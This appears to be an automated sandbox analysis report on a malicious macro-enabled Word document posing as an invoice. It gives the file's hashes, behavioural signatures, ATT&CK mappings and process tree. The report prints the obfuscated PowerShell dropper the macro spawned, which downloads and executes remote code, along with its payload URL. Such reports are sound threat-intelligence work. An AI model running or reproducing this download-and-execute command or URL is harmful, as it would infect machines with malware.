Analysis

  • max time kernel
    143s
  • max time network
    138s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-09-2022 17:35

General

  • Target

    INVOICE PACKAGE LINK TO DOWNLOAD.docm

  • Size

    16KB

  • MD5

    f2d0c66b801244c059f636d08a474079

  • SHA1

    c62129fff128817b5af62aa0051c082f9992112e

  • SHA256

    08d4fd5032b8b24072bdff43932630d4200f68404d7e12ffeeda2364c8158873

  • SHA512

    5283b2c228d6bdfe5d942f0a318ecd7e251e8a78d1451dc825f05e35d5e07a362e04c8777f63761b13bc672e76391cdc11be5e86ae4a260715e3e5a5cd2f305d

  • SSDEEP

    384:/iMIoinwt9VRFPZ1AZy8WNxt/ZtNN6wyMDv6js2ZzoP6Yv:/7u651AQrxllN6wyMOAOUPPv

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://filetransfer.io/data-package/UR2whuBv/download

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 16 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\INVOICE PACKAGE LINK TO DOWNLOAD.docm" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4760
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell I`EX ((n`e`W`-Obj`E`c`T (('Net'+'.'+'Webc'+'lient'))).(('D'+'o'+'w'+'n'+'l'+'o'+'a'+'d'+'s'+'tri'+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+''+'n'+'g')).InVokE((('https://filetransfer.io/data-package/UR2whuBv/download'))))
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4188

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/4188-139-0x0000000000000000-mapping.dmp
  • memory/4188-140-0x000001DF268E0000-0x000001DF26902000-memory.dmp
    Filesize

    136KB

  • memory/4188-141-0x00007FFB84DC0000-0x00007FFB85881000-memory.dmp
    Filesize

    10.8MB

  • memory/4188-142-0x00007FFB84DC0000-0x00007FFB85881000-memory.dmp
    Filesize

    10.8MB

  • memory/4760-132-0x00007FFB70CF0000-0x00007FFB70D00000-memory.dmp
    Filesize

    64KB

  • memory/4760-133-0x00007FFB70CF0000-0x00007FFB70D00000-memory.dmp
    Filesize

    64KB

  • memory/4760-134-0x00007FFB70CF0000-0x00007FFB70D00000-memory.dmp
    Filesize

    64KB

  • memory/4760-135-0x00007FFB70CF0000-0x00007FFB70D00000-memory.dmp
    Filesize

    64KB

  • memory/4760-136-0x00007FFB70CF0000-0x00007FFB70D00000-memory.dmp
    Filesize

    64KB

  • memory/4760-137-0x00007FFB6E6B0000-0x00007FFB6E6C0000-memory.dmp
    Filesize

    64KB

  • memory/4760-138-0x00007FFB6E6B0000-0x00007FFB6E6C0000-memory.dmp
    Filesize

    64KB